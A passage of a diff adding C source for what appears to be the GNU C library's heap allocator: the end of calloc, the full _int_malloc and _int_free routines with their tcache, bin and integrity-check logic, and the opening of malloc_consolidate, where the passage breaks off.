+  INTERNAL_SIZE_T *d;
+
+  /* size_t is unsigned so the behavior on overflow is defined.  */
+  bytes = n * elem_size;
+#define HALF_INTERNAL_SIZE_T \
+  (((INTERNAL_SIZE_T) 1) << (8 * sizeof (INTERNAL_SIZE_T) / 2))
+  if (__builtin_expect ((n | elem_size) >= HALF_INTERNAL_SIZE_T, 0))
+    {
+      if (elem_size != 0 && bytes / elem_size != n)
+        {
+          __set_errno (ENOMEM);
+          return 0;
+        }
+    }
+
+  void *(*hook) (size_t, const void *) =
+    atomic_forced_read (__malloc_hook);
+  if (__builtin_expect (hook != NULL, 0))
+    {
+      sz = bytes;
+      mem = (*hook)(sz, RETURN_ADDRESS (0));
+      if (mem == 0)
+        return 0;
+
+      return memset (mem, 0, sz);
+    }
+
+  sz = bytes;
+
+  MAYBE_INIT_TCACHE ();
+
+  if (SINGLE_THREAD_P)
+    av = &main_arena;
+  else
+    arena_get (av, sz);
+
+  if (av)
+    {
+      /* Check if we hand out the top chunk, in which case there may be no
+	 need to clear. */
+#if MORECORE_CLEARS
+      oldtop = top (av);
+      oldtopsize = chunksize (top (av));
+# if MORECORE_CLEARS < 2
+      /* Only newly allocated memory is guaranteed to be cleared.  */
+      if (av == &main_arena &&
+	  oldtopsize < mp_.sbrk_base + av->max_system_mem - (char *) oldtop)
+	oldtopsize = (mp_.sbrk_base + av->max_system_mem - (char *) oldtop);
+# endif
+      if (av != &main_arena)
+	{
+	  heap_info *heap = heap_for_ptr (oldtop);
+	  if (oldtopsize < (char *) heap + heap->mprotect_size - (char *) oldtop)
+	    oldtopsize = (char *) heap + heap->mprotect_size - (char *) oldtop;
+	}
+#endif
+    }
+  else
+    {
+      /* No usable arenas.  */
+      oldtop = 0;
+      oldtopsize = 0;
+    }
+  mem = _int_malloc (av, sz);
+
+  assert (!mem || chunk_is_mmapped (mem2chunk (mem)) ||
+          av == arena_for_chunk (mem2chunk (mem)));
+
+  if (!SINGLE_THREAD_P)
+    {
+      if (mem == 0 && av != NULL)
+	{
+	  LIBC_PROBE (memory_calloc_retry, 1, sz);
+	  av = arena_get_retry (av, sz);
+	  mem = _int_malloc (av, sz);
+	}
+
+      if (av != NULL)
+	__libc_lock_unlock (av->mutex);
+    }
+
+  /* Allocation failed even after a retry.  */
+  if (mem == 0)
+    return 0;
+
+  p = mem2chunk (mem);
+
+  /* Two optional cases in which clearing not necessary */
+  if (chunk_is_mmapped (p))
+    {
+      if (__builtin_expect (perturb_byte, 0))
+        return memset (mem, 0, sz);
+
+      return mem;
+    }
+
+  csz = chunksize (p);
+
+#if MORECORE_CLEARS
+  if (perturb_byte == 0 && (p == oldtop && csz > oldtopsize))
+    {
+      /* clear only the bytes from non-freshly-sbrked memory */
+      csz = oldtopsize;
+    }
+#endif
+
+  /* Unroll clear of <= 36 bytes (72 if 8byte sizes).  We know that
+     contents have an odd number of INTERNAL_SIZE_T-sized words;
+     minimally 3.  */
+  d = (INTERNAL_SIZE_T *) mem;
+  clearsize = csz - SIZE_SZ;
+  nclears = clearsize / sizeof (INTERNAL_SIZE_T);
+  assert (nclears >= 3);
+
+  if (nclears > 9)
+    return memset (d, 0, clearsize);
+
+  else
+    {
+      *(d + 0) = 0;
+      *(d + 1) = 0;
+      *(d + 2) = 0;
+      if (nclears > 4)
+        {
+          *(d + 3) = 0;
+          *(d + 4) = 0;
+          if (nclears > 6)
+            {
+              *(d + 5) = 0;
+              *(d + 6) = 0;
+              if (nclears > 8)
+                {
+                  *(d + 7) = 0;
+                  *(d + 8) = 0;
+                }
+            }
+        }
+    }
+
+  return mem;
+}
+
+/*
+   ------------------------------ malloc ------------------------------
+ */
+
+static void *
+_int_malloc (mstate av, size_t bytes)
+{
+  INTERNAL_SIZE_T nb;               /* normalized request size */
+  unsigned int idx;                 /* associated bin index */
+  mbinptr bin;                      /* associated bin */
+
+  mchunkptr victim;                 /* inspected/selected chunk */
+  INTERNAL_SIZE_T size;             /* its size */
+  int victim_index;                 /* its bin index */
+
+  mchunkptr remainder;              /* remainder from a split */
+  unsigned long remainder_size;     /* its size */
+
+  unsigned int block;               /* bit map traverser */
+  unsigned int bit;                 /* bit map traverser */
+  unsigned int map;                 /* current word of binmap */
+
+  mchunkptr fwd;                    /* misc temp for linking */
+  mchunkptr bck;                    /* misc temp for linking */
+
+#if USE_TCACHE
+  size_t tcache_unsorted_count;	    /* count of unsorted chunks processed */
+#endif
+
+  /*
+     Convert request size to internal form by adding SIZE_SZ bytes
+     overhead plus possibly more to obtain necessary alignment and/or
+     to obtain a size of at least MINSIZE, the smallest allocatable
+     size. Also, checked_request2size traps (returning 0) request sizes
+     that are so large that they wrap around zero when padded and
+     aligned.
+   */
+
+  checked_request2size (bytes, nb);
+
+  /* There are no usable arenas.  Fall back to sysmalloc to get a chunk from
+     mmap.  */
+  if (__glibc_unlikely (av == NULL))
+    {
+      void *p = sysmalloc (nb, av);
+      if (p != NULL)
+	alloc_perturb (p, bytes);
+      return p;
+    }
+
+  /*
+     If the size qualifies as a fastbin, first check corresponding bin.
+     This code is safe to execute even if av is not yet initialized, so we
+     can try it without checking, which saves some time on this fast path.
+   */
+
+#define REMOVE_FB(fb, victim, pp)			\
+  do							\
+    {							\
+      victim = pp;					\
+      if (victim == NULL)				\
+	break;						\
+    }							\
+  while ((pp = catomic_compare_and_exchange_val_acq (fb, victim->fd, victim)) \
+	 != victim);					\
+
+  if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ()))
+    {
+      idx = fastbin_index (nb);
+      mfastbinptr *fb = &fastbin (av, idx);
+      mchunkptr pp;
+      victim = *fb;
+
+      if (victim != NULL)
+	{
+	  if (SINGLE_THREAD_P)
+	    *fb = victim->fd;
+	  else
+	    REMOVE_FB (fb, pp, victim);
+	  if (__glibc_likely (victim != NULL))
+	    {
+	      size_t victim_idx = fastbin_index (chunksize (victim));
+	      if (__builtin_expect (victim_idx != idx, 0))
+		malloc_printerr ("malloc(): memory corruption (fast)");
+	      check_remalloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	      /* While we're here, if we see other chunks of the same size,
+		 stash them in the tcache.  */
+	      size_t tc_idx = csize2tidx (nb);
+	      if (tcache && tc_idx < mp_.tcache_bins)
+		{
+		  mchunkptr tc_victim;
+
+		  /* While bin not empty and tcache not full, copy chunks.  */
+		  while (tcache->counts[tc_idx] < mp_.tcache_count
+			 && (tc_victim = *fb) != NULL)
+		    {
+		      if (SINGLE_THREAD_P)
+			*fb = tc_victim->fd;
+		      else
+			{
+			  REMOVE_FB (fb, pp, tc_victim);
+			  if (__glibc_unlikely (tc_victim == NULL))
+			    break;
+			}
+		      tcache_put (tc_victim, tc_idx);
+		    }
+		}
+#endif
+	      void *p = chunk2mem (victim);
+	      alloc_perturb (p, bytes);
+	      return p;
+	    }
+	}
+    }
+
+  /*
+     If a small request, check regular bin.  Since these "smallbins"
+     hold one size each, no searching within bins is necessary.
+     (For a large request, we need to wait until unsorted chunks are
+     processed to find best fit. But for small ones, fits are exact
+     anyway, so we can check now, which is faster.)
+   */
+
+  if (in_smallbin_range (nb))
+    {
+      idx = smallbin_index (nb);
+      bin = bin_at (av, idx);
+
+      if ((victim = last (bin)) != bin)
+        {
+          bck = victim->bk;
+	  if (__glibc_unlikely (bck->fd != victim))
+	    malloc_printerr ("malloc(): smallbin double linked list corrupted");
+          set_inuse_bit_at_offset (victim, nb);
+          bin->bk = bck;
+          bck->fd = bin;
+
+          if (av != &main_arena)
+	    set_non_main_arena (victim);
+          check_malloced_chunk (av, victim, nb);
+#if USE_TCACHE
+	  /* While we're here, if we see other chunks of the same size,
+	     stash them in the tcache.  */
+	  size_t tc_idx = csize2tidx (nb);
+	  if (tcache && tc_idx < mp_.tcache_bins)
+	    {
+	      mchunkptr tc_victim;
+
+	      /* While bin not empty and tcache not full, copy chunks over.  */
+	      while (tcache->counts[tc_idx] < mp_.tcache_count
+		     && (tc_victim = last (bin)) != bin)
+		{
+		  if (tc_victim != 0)
+		    {
+		      bck = tc_victim->bk;
+		      set_inuse_bit_at_offset (tc_victim, nb);
+		      if (av != &main_arena)
+			set_non_main_arena (tc_victim);
+		      bin->bk = bck;
+		      bck->fd = bin;
+
+		      tcache_put (tc_victim, tc_idx);
+	            }
+		}
+	    }
+#endif
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+
+  /*
+     If this is a large request, consolidate fastbins before continuing.
+     While it might look excessive to kill all fastbins before
+     even seeing if there is space available, this avoids
+     fragmentation problems normally associated with fastbins.
+     Also, in practice, programs tend to have runs of either small or
+     large requests, but less often mixtures, so consolidation is not
+     invoked all that often in most programs. And the programs that
+     it is called frequently in otherwise tend to fragment.
+   */
+
+  else
+    {
+      idx = largebin_index (nb);
+      if (atomic_load_relaxed (&av->have_fastchunks))
+        malloc_consolidate (av);
+    }
+
+  /*
+     Process recently freed or remaindered chunks, taking one only if
+     it is exact fit, or, if this a small request, the chunk is remainder from
+     the most recent non-exact fit.  Place other traversed chunks in
+     bins.  Note that this step is the only place in any routine where
+     chunks are placed in bins.
+
+     The outer loop here is needed because we might not realize until
+     near the end of malloc that we should have consolidated, so must
+     do so and retry. This happens at most once, and only when we would
+     otherwise need to expand memory to service a "small" request.
+   */
+
+#if USE_TCACHE
+  INTERNAL_SIZE_T tcache_nb = 0;
+  size_t tc_idx = csize2tidx (nb);
+  if (tcache && tc_idx < mp_.tcache_bins)
+    tcache_nb = nb;
+  int return_cached = 0;
+
+  tcache_unsorted_count = 0;
+#endif
+
+  for (;; )
+    {
+      int iters = 0;
+      while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
+        {
+          bck = victim->bk;
+          size = chunksize (victim);
+          mchunkptr next = chunk_at_offset (victim, size);
+
+          if (__glibc_unlikely (size <= 2 * SIZE_SZ)
+              || __glibc_unlikely (size > av->system_mem))
+            malloc_printerr ("malloc(): invalid size (unsorted)");
+          if (__glibc_unlikely (chunksize_nomask (next) < 2 * SIZE_SZ)
+              || __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
+            malloc_printerr ("malloc(): invalid next size (unsorted)");
+          if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size))
+            malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
+          if (__glibc_unlikely (bck->fd != victim)
+              || __glibc_unlikely (victim->fd != unsorted_chunks (av)))
+            malloc_printerr ("malloc(): unsorted double linked list corrupted");
+          if (__glibc_unlikely (prev_inuse (next)))
+            malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");
+
+          /*
+             If a small request, try to use last remainder if it is the
+             only chunk in unsorted bin.  This helps promote locality for
+             runs of consecutive small requests. This is the only
+             exception to best-fit, and applies only when there is
+             no exact fit for a small chunk.
+           */
+
+          if (in_smallbin_range (nb) &&
+              bck == unsorted_chunks (av) &&
+              victim == av->last_remainder &&
+              (unsigned long) (size) > (unsigned long) (nb + MINSIZE))
+            {
+              /* split and reattach remainder */
+              remainder_size = size - nb;
+              remainder = chunk_at_offset (victim, nb);
+              unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
+              av->last_remainder = remainder;
+              remainder->bk = remainder->fd = unsorted_chunks (av);
+              if (!in_smallbin_range (remainder_size))
+                {
+                  remainder->fd_nextsize = NULL;
+                  remainder->bk_nextsize = NULL;
+                }
+
+              set_head (victim, nb | PREV_INUSE |
+                        (av != &main_arena ? NON_MAIN_ARENA : 0));
+              set_head (remainder, remainder_size | PREV_INUSE);
+              set_foot (remainder, remainder_size);
+
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+
+          /* remove from unsorted list */
+          if (__glibc_unlikely (bck->fd != victim))
+            malloc_printerr ("malloc(): corrupted unsorted chunks 3");
+          unsorted_chunks (av)->bk = bck;
+          bck->fd = unsorted_chunks (av);
+
+          /* Take now instead of binning if exact fit */
+
+          if (size == nb)
+            {
+              set_inuse_bit_at_offset (victim, size);
+              if (av != &main_arena)
+		set_non_main_arena (victim);
+#if USE_TCACHE
+	      /* Fill cache first, return to user only if cache fills.
+		 We may return one of these chunks later.  */
+	      if (tcache_nb
+		  && tcache->counts[tc_idx] < mp_.tcache_count)
+		{
+		  tcache_put (victim, tc_idx);
+		  return_cached = 1;
+		  continue;
+		}
+	      else
+		{
+#endif
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+#if USE_TCACHE
+		}
+#endif
+            }
+
+          /* place chunk in bin */
+
+          if (in_smallbin_range (size))
+            {
+              victim_index = smallbin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+            }
+          else
+            {
+              victim_index = largebin_index (size);
+              bck = bin_at (av, victim_index);
+              fwd = bck->fd;
+
+              /* maintain large bins in sorted order */
+              if (fwd != bck)
+                {
+                  /* Or with inuse bit to speed comparisons */
+                  size |= PREV_INUSE;
+                  /* if smaller than smallest, bypass loop below */
+                  assert (chunk_main_arena (bck->bk));
+                  if ((unsigned long) (size)
+		      < (unsigned long) chunksize_nomask (bck->bk))
+                    {
+                      fwd = bck;
+                      bck = bck->bk;
+
+                      victim->fd_nextsize = fwd->fd;
+                      victim->bk_nextsize = fwd->fd->bk_nextsize;
+                      fwd->fd->bk_nextsize = victim->bk_nextsize->fd_nextsize = victim;
+                    }
+                  else
+                    {
+                      assert (chunk_main_arena (fwd));
+                      while ((unsigned long) size < chunksize_nomask (fwd))
+                        {
+                          fwd = fwd->fd_nextsize;
+			  assert (chunk_main_arena (fwd));
+                        }
+
+                      if ((unsigned long) size
+			  == (unsigned long) chunksize_nomask (fwd))
+                        /* Always insert in the second position.  */
+                        fwd = fwd->fd;
+                      else
+                        {
+                          victim->fd_nextsize = fwd;
+                          victim->bk_nextsize = fwd->bk_nextsize;
+                          fwd->bk_nextsize = victim;
+                          victim->bk_nextsize->fd_nextsize = victim;
+                        }
+                      bck = fwd->bk;
+                    }
+                }
+              else
+                victim->fd_nextsize = victim->bk_nextsize = victim;
+            }
+
+          mark_bin (av, victim_index);
+          victim->bk = bck;
+          victim->fd = fwd;
+          fwd->bk = victim;
+          bck->fd = victim;
+
+#if USE_TCACHE
+      /* If we've processed as many chunks as we're allowed while
+	 filling the cache, return one of the cached ones.  */
+      ++tcache_unsorted_count;
+      if (return_cached
+	  && mp_.tcache_unsorted_limit > 0
+	  && tcache_unsorted_count > mp_.tcache_unsorted_limit)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+#define MAX_ITERS       10000
+          if (++iters >= MAX_ITERS)
+            break;
+        }
+
+#if USE_TCACHE
+      /* If all the small chunks we found ended up cached, return one now.  */
+      if (return_cached)
+	{
+	  return tcache_get (tc_idx);
+	}
+#endif
+
+      /*
+         If a large request, scan through the chunks of current bin in
+         sorted order to find smallest that fits.  Use the skip list for this.
+       */
+
+      if (!in_smallbin_range (nb))
+        {
+          bin = bin_at (av, idx);
+
+          /* skip scan if empty or largest chunk is too small */
+          if ((victim = first (bin)) != bin
+	      && (unsigned long) chunksize_nomask (victim)
+	        >= (unsigned long) (nb))
+            {
+              victim = victim->bk_nextsize;
+              while (((unsigned long) (size = chunksize (victim)) <
+                      (unsigned long) (nb)))
+                victim = victim->bk_nextsize;
+
+              /* Avoid removing the first entry for a size so that the skip
+                 list does not have to be rerouted.  */
+              if (victim != last (bin)
+		  && chunksize_nomask (victim)
+		    == chunksize_nomask (victim->fd))
+                victim = victim->fd;
+
+              remainder_size = size - nb;
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+      /*
+         Search for a chunk by scanning bins, starting with next largest
+         bin. This search is strictly by best-fit; i.e., the smallest
+         (with ties going to approximately the least recently used) chunk
+         that fits is selected.
+
+         The bitmap avoids needing to check that most blocks are nonempty.
+         The particular case of skipping all bins during warm-up phases
+         when no chunks have been returned yet is faster than it might look.
+       */
+
+      ++idx;
+      bin = bin_at (av, idx);
+      block = idx2block (idx);
+      map = av->binmap[block];
+      bit = idx2bit (idx);
+
+      for (;; )
+        {
+          /* Skip rest of block if there are no more set bits in this block.  */
+          if (bit > map || bit == 0)
+            {
+              do
+                {
+                  if (++block >= BINMAPSIZE) /* out of bins */
+                    goto use_top;
+                }
+              while ((map = av->binmap[block]) == 0);
+
+              bin = bin_at (av, (block << BINMAPSHIFT));
+              bit = 1;
+            }
+
+          /* Advance to bin with set bit. There must be one. */
+          while ((bit & map) == 0)
+            {
+              bin = next_bin (bin);
+              bit <<= 1;
+              assert (bit != 0);
+            }
+
+          /* Inspect the bin. It is likely to be non-empty */
+          victim = last (bin);
+
+          /*  If a false alarm (empty bin), clear the bit. */
+          if (victim == bin)
+            {
+              av->binmap[block] = map &= ~bit; /* Write through */
+              bin = next_bin (bin);
+              bit <<= 1;
+            }
+
+          else
+            {
+              size = chunksize (victim);
+
+              /*  We know the first chunk in this bin is big enough to use. */
+              assert ((unsigned long) (size) >= (unsigned long) (nb));
+
+              remainder_size = size - nb;
+
+              /* unlink */
+              unlink_chunk (av, victim);
+
+              /* Exhaust */
+              if (remainder_size < MINSIZE)
+                {
+                  set_inuse_bit_at_offset (victim, size);
+                  if (av != &main_arena)
+		    set_non_main_arena (victim);
+                }
+
+              /* Split */
+              else
+                {
+                  remainder = chunk_at_offset (victim, nb);
+
+                  /* We cannot assume the unsorted list is empty and therefore
+                     have to perform a complete insert here.  */
+                  bck = unsorted_chunks (av);
+                  fwd = bck->fd;
+		  if (__glibc_unlikely (fwd->bk != bck))
+		    malloc_printerr ("malloc(): corrupted unsorted chunks 2");
+                  remainder->bk = bck;
+                  remainder->fd = fwd;
+                  bck->fd = remainder;
+                  fwd->bk = remainder;
+
+                  /* advertise as last remainder */
+                  if (in_smallbin_range (nb))
+                    av->last_remainder = remainder;
+                  if (!in_smallbin_range (remainder_size))
+                    {
+                      remainder->fd_nextsize = NULL;
+                      remainder->bk_nextsize = NULL;
+                    }
+                  set_head (victim, nb | PREV_INUSE |
+                            (av != &main_arena ? NON_MAIN_ARENA : 0));
+                  set_head (remainder, remainder_size | PREV_INUSE);
+                  set_foot (remainder, remainder_size);
+                }
+              check_malloced_chunk (av, victim, nb);
+              void *p = chunk2mem (victim);
+              alloc_perturb (p, bytes);
+              return p;
+            }
+        }
+
+    use_top:
+      /*
+         If large enough, split off the chunk bordering the end of memory
+         (held in av->top). Note that this is in accord with the best-fit
+         search rule.  In effect, av->top is treated as larger (and thus
+         less well fitting) than any other available chunk since it can
+         be extended to be as large as necessary (up to system
+         limitations).
+
+         We require that av->top always exists (i.e., has size >=
+         MINSIZE) after initialization, so if it would otherwise be
+         exhausted by current request, it is replenished. (The main
+         reason for ensuring it exists is that we may need MINSIZE space
+         to put in fenceposts in sysmalloc.)
+       */
+
+      victim = av->top;
+      size = chunksize (victim);
+
+      if (__glibc_unlikely (size > av->system_mem))
+        malloc_printerr ("malloc(): corrupted top size");
+
+      if ((unsigned long) (size) >= (unsigned long) (nb + MINSIZE))
+        {
+          remainder_size = size - nb;
+          remainder = chunk_at_offset (victim, nb);
+          av->top = remainder;
+          set_head (victim, nb | PREV_INUSE |
+                    (av != &main_arena ? NON_MAIN_ARENA : 0));
+          set_head (remainder, remainder_size | PREV_INUSE);
+
+          check_malloced_chunk (av, victim, nb);
+          void *p = chunk2mem (victim);
+          alloc_perturb (p, bytes);
+          return p;
+        }
+
+      /* When we are using atomic ops to free fast chunks we can get
+         here for all block sizes.  */
+      else if (atomic_load_relaxed (&av->have_fastchunks))
+        {
+          malloc_consolidate (av);
+          /* restore original bin index */
+          if (in_smallbin_range (nb))
+            idx = smallbin_index (nb);
+          else
+            idx = largebin_index (nb);
+        }
+
+      /*
+         Otherwise, relay to handle system-dependent cases
+       */
+      else
+        {
+          void *p = sysmalloc (nb, av);
+          if (p != NULL)
+            alloc_perturb (p, bytes);
+          return p;
+        }
+    }
+}
+
+/*
+   ------------------------------ free ------------------------------
+ */
+
+static void
+_int_free (mstate av, mchunkptr p, int have_lock)
+{
+  INTERNAL_SIZE_T size;        /* its size */
+  mfastbinptr *fb;             /* associated fastbin */
+  mchunkptr nextchunk;         /* next contiguous chunk */
+  INTERNAL_SIZE_T nextsize;    /* its size */
+  int nextinuse;               /* true if nextchunk is used */
+  INTERNAL_SIZE_T prevsize;    /* size of previous contiguous chunk */
+  mchunkptr bck;               /* misc temp for linking */
+  mchunkptr fwd;               /* misc temp for linking */
+
+  size = chunksize (p);
+
+  /* Little security check which won't hurt performance: the
+     allocator never wrapps around at the end of the address space.
+     Therefore we can exclude some size values which might appear
+     here by accident or by "design" from some intruder.  */
+  if (__builtin_expect ((uintptr_t) p > (uintptr_t) -size, 0)
+      || __builtin_expect (misaligned_chunk (p), 0))
+    malloc_printerr ("free(): invalid pointer");
+  /* We know that each chunk is at least MINSIZE bytes in size or a
+     multiple of MALLOC_ALIGNMENT.  */
+  if (__glibc_unlikely (size < MINSIZE || !aligned_OK (size)))
+    malloc_printerr ("free(): invalid size");
+
+  check_inuse_chunk(av, p);
+
+#if USE_TCACHE
+  {
+    size_t tc_idx = csize2tidx (size);
+    if (tcache != NULL && tc_idx < mp_.tcache_bins)
+      {
+	/* Check to see if it's already in the tcache.  */
+	tcache_entry *e = (tcache_entry *) chunk2mem (p);
+
+	/* This test succeeds on double free.  However, we don't 100%
+	   trust it (it also matches random payload data at a 1 in
+	   2^<size_t> chance), so verify it's not an unlikely
+	   coincidence before aborting.  */
+	if (__glibc_unlikely (e->key == tcache))
+	  {
+	    tcache_entry *tmp;
+	    LIBC_PROBE (memory_tcache_double_free, 2, e, tc_idx);
+	    for (tmp = tcache->entries[tc_idx];
+		 tmp;
+		 tmp = tmp->next)
+	      if (tmp == e)
+		malloc_printerr ("free(): double free detected in tcache 2");
+	    /* If we get here, it was a coincidence.  We've wasted a
+	       few cycles, but don't abort.  */
+	  }
+
+	if (tcache->counts[tc_idx] < mp_.tcache_count)
+	  {
+	    tcache_put (p, tc_idx);
+	    return;
+	  }
+      }
+  }
+#endif
+
+  /*
+    If eligible, place chunk on a fastbin so it can be found
+    and used quickly in malloc.
+  */
+
+  if ((unsigned long)(size) <= (unsigned long)(get_max_fast ())
+
+#if TRIM_FASTBINS
+      /*
+	If TRIM_FASTBINS set, don't place chunks
+	bordering top into fastbins
+      */
+      && (chunk_at_offset(p, size) != av->top)
+#endif
+      ) {
+
+    if (__builtin_expect (chunksize_nomask (chunk_at_offset (p, size))
+			  <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (chunksize (chunk_at_offset (p, size))
+			     >= av->system_mem, 0))
+      {
+	bool fail = true;
+	/* We might not have a lock at this point and concurrent modifications
+	   of system_mem might result in a false positive.  Redo the test after
+	   getting the lock.  */
+	if (!have_lock)
+	  {
+	    __libc_lock_lock (av->mutex);
+	    fail = (chunksize_nomask (chunk_at_offset (p, size)) <= 2 * SIZE_SZ
+		    || chunksize (chunk_at_offset (p, size)) >= av->system_mem);
+	    __libc_lock_unlock (av->mutex);
+	  }
+
+	if (fail)
+	  malloc_printerr ("free(): invalid next size (fast)");
+      }
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    atomic_store_relaxed (&av->have_fastchunks, true);
+    unsigned int idx = fastbin_index(size);
+    fb = &fastbin (av, idx);
+
+    /* Atomically link P to its fastbin: P->FD = *FB; *FB = P;  */
+    mchunkptr old = *fb, old2;
+
+    if (SINGLE_THREAD_P)
+      {
+	/* Check that the top of the bin is not the record we are going to
+	   add (i.e., double free).  */
+	if (__builtin_expect (old == p, 0))
+	  malloc_printerr ("double free or corruption (fasttop)");
+	p->fd = old;
+	*fb = p;
+      }
+    else
+      do
+	{
+	  /* Check that the top of the bin is not the record we are going to
+	     add (i.e., double free).  */
+	  if (__builtin_expect (old == p, 0))
+	    malloc_printerr ("double free or corruption (fasttop)");
+	  p->fd = old2 = old;
+	}
+      while ((old = catomic_compare_and_exchange_val_rel (fb, p, old2))
+	     != old2);
+
+    /* Check that size of fastbin chunk at the top is the same as
+       size of the chunk that we are adding.  We can dereference OLD
+       only if we have the lock, otherwise it might have already been
+       allocated again.  */
+    if (have_lock && old != NULL
+	&& __builtin_expect (fastbin_index (chunksize (old)) != idx, 0))
+      malloc_printerr ("invalid fastbin entry (free)");
+  }
+
+  /*
+    Consolidate other non-mmapped chunks as they arrive.
+  */
+
+  else if (!chunk_is_mmapped(p)) {
+
+    /* If we're single-threaded, don't lock the arena.  */
+    if (SINGLE_THREAD_P)
+      have_lock = true;
+
+    if (!have_lock)
+      __libc_lock_lock (av->mutex);
+
+    nextchunk = chunk_at_offset(p, size);
+
+    /* Lightweight tests: check whether the block is already the
+       top block.  */
+    if (__glibc_unlikely (p == av->top))
+      malloc_printerr ("double free or corruption (top)");
+    /* Or whether the next chunk is beyond the boundaries of the arena.  */
+    if (__builtin_expect (contiguous (av)
+			  && (char *) nextchunk
+			  >= ((char *) av->top + chunksize(av->top)), 0))
+	malloc_printerr ("double free or corruption (out)");
+    /* Or whether the block is actually not marked used.  */
+    if (__glibc_unlikely (!prev_inuse(nextchunk)))
+      malloc_printerr ("double free or corruption (!prev)");
+
+    nextsize = chunksize(nextchunk);
+    if (__builtin_expect (chunksize_nomask (nextchunk) <= 2 * SIZE_SZ, 0)
+	|| __builtin_expect (nextsize >= av->system_mem, 0))
+      malloc_printerr ("free(): invalid next size (normal)");
+
+    free_perturb (chunk2mem(p), size - 2 * SIZE_SZ);
+
+    /* consolidate backward */
+    if (!prev_inuse(p)) {
+      prevsize = prev_size (p);
+      size += prevsize;
+      p = chunk_at_offset(p, -((long) prevsize));
+      if (__glibc_unlikely (chunksize(p) != prevsize))
+        malloc_printerr ("corrupted size vs. prev_size while consolidating");
+      unlink_chunk (av, p);
+    }
+
+    if (nextchunk != av->top) {
+      /* get and clear inuse bit */
+      nextinuse = inuse_bit_at_offset(nextchunk, nextsize);
+
+      /* consolidate forward */
+      if (!nextinuse) {
+	unlink_chunk (av, nextchunk);
+	size += nextsize;
+      } else
+	clear_inuse_bit_at_offset(nextchunk, 0);
+
+      /*
+	Place the chunk in unsorted chunk list. Chunks are
+	not placed into regular bins until after they have
+	been given one chance to be used in malloc.
+      */
+
+      bck = unsorted_chunks(av);
+      fwd = bck->fd;
+      if (__glibc_unlikely (fwd->bk != bck))
+	malloc_printerr ("free(): corrupted unsorted chunks");
+      p->fd = fwd;
+      p->bk = bck;
+      if (!in_smallbin_range(size))
+	{
+	  p->fd_nextsize = NULL;
+	  p->bk_nextsize = NULL;
+	}
+      bck->fd = p;
+      fwd->bk = p;
+
+      set_head(p, size | PREV_INUSE);
+      set_foot(p, size);
+
+      check_free_chunk(av, p);
+    }
+
+    /*
+      If the chunk borders the current high end of memory,
+      consolidate into top
+    */
+
+    else {
+      size += nextsize;
+      set_head(p, size | PREV_INUSE);
+      av->top = p;
+      check_chunk(av, p);
+    }
+
+    /*
+      If freeing a large space, consolidate possibly-surrounding
+      chunks. Then, if the total unused topmost memory exceeds trim
+      threshold, ask malloc_trim to reduce top.
+
+      Unless max_fast is 0, we don't know if there are fastbins
+      bordering top, so we cannot tell for sure whether threshold
+      has been reached unless fastbins are consolidated.  But we
+      don't want to consolidate on each free.  As a compromise,
+      consolidation is performed if FASTBIN_CONSOLIDATION_THRESHOLD
+      is reached.
+    */
+
+    if ((unsigned long)(size) >= FASTBIN_CONSOLIDATION_THRESHOLD) {
+      if (atomic_load_relaxed (&av->have_fastchunks))
+	malloc_consolidate(av);
+
+      if (av == &main_arena) {
+#ifndef MORECORE_CANNOT_TRIM
+	if ((unsigned long)(chunksize(av->top)) >=
+	    (unsigned long)(mp_.trim_threshold))
+	  systrim(mp_.top_pad, av);
+#endif
+      } else {
+	/* Always try heap_trim(), even if the top chunk is not
+	   large, because the corresponding heap might go away.  */
+	heap_info *heap = heap_for_ptr(top(av));
+
+	assert(heap->ar_ptr == av);
+	heap_trim(heap, mp_.top_pad);
+      }
+    }
+
+    if (!have_lock)
+      __libc_lock_unlock (av->mutex);
+  }
+  /*
+    If the chunk was allocated via mmap, release via munmap().
+  */
+
+  else {
+    munmap_chunk (p);
+  }
+}
+
+/*
+  ------------------------- malloc_consolidate -------------------------
+
+  malloc_consolidate is a specialized version of free() that tears
+  down chunks held in fastbins.  Free itself cannot be used for this
+  purpose since, among other things, it might place chunks back onto
+  fastbins.  So, instead, we need to use a minor variant of the same
+  code.
+*/
+
+static void malloc_consolidate(mstate av)
+{
+  mfastbinptr*    fb;                 /* current fastbin being consolidated */
+  mfastbinptr*    maxfb;              /* last fastbin (for loop control) */
+  mchunkptr       p;                  /* current chunk being consolidated */
